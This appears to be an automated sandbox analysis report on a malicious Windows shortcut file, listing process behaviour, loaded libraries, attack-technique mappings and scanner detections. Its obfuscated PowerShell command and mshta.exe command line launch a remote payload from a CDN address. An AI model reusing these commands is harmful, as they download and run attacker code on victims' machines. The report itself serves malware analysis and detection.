Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: PDp2UpMXz1.lnkLNK file: ..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4005Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2875Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4364Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4196Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000005.00000002.3357788460.000001E648E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: mshta.exe, 00000003.00000002.3357203743.000002453902D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3357203743.0000024538F9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3359824959.000001E64E65B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000003.00000002.3357203743.0000024538FD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodexJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell
1
DLL Side-Loading
11
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PDp2UpMXz1.lnk42%VirustotalBrowse
PDp2UpMXz1.lnk45%ReversingLabsShortcut.Trojan.WinLnk
PDp2UpMXz1.lnk100%AviraLNK/Dldr.Agent.VPYB
PDp2UpMXz1.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bunnycdn.com0%VirustotalBrowse
fatodex.b-cdn.net9%VirustotalBrowse
bunnyfonts.b-cdn.net0%VirustotalBrowse
bunny.net0%VirustotalBrowse
bunnycdn.b-cdn.net1%VirustotalBrowse
fonts.bunny.net0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://fonts.bunny.net/rubik/files/rubik-hebrew-70%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svg0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-700-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/k0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svg0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)0%VirustotalBrowse
https://bunny.net/v2/images/bunnynet-logo.svgcss/unconfigured.cssent0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)0%Avira URL Cloudsafe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)0%VirustotalBrowse
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg2)x0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css:0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svgroviderC0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-arabic-900-normal.woff)0%Avira URL Cloudsafe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg);0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/0%VirustotalBrowse
https://fonts.b0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)0%Avira URL Cloudsafe
https://bunny.net/lib/jquery/jquery.min.js0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)0%Avira URL Cloudsafe
https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.cssC:0%Avira URL Cloudsafe
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,9000%Avira URL Cloudsafe
https://bunny.net/0%Avira URL Cloudsafe
https://bunnynetassets.b-cdn.net/icons/arrow.svg0%Avira URL Cloudsafe
https://bunny.net/lib/jquery/jquery.min.js0%VirustotalBrowse
https://fonts.bunny.net/r0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)0%Avira URL Cloudsafe
https://bunnynetassets.b-cdn.net/error.png0%Avira URL Cloudsafe
http://fonts.bunny.net/css?family=Rubik:300,400,500,700,9000%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)0%Avira URL Cloudsafe
https://fatodex.b-cdn.net/fatodexAC0%Avira URL Cloudsafe
https://bunnynetassets.b-cdn.net/icons/arrow.svg0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-400-normal.woff)0%Avira URL Cloudsafe
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)0%VirustotalBrowse
https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)0%Avira URL Cloudsafe
https://bunny.net/v2/images/bunnynet-logo.svgq0%Avira URL Cloudsafe
https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svgJ0%Avira URL Cloudsafe
https://bunny.net/0%VirustotalBrowse
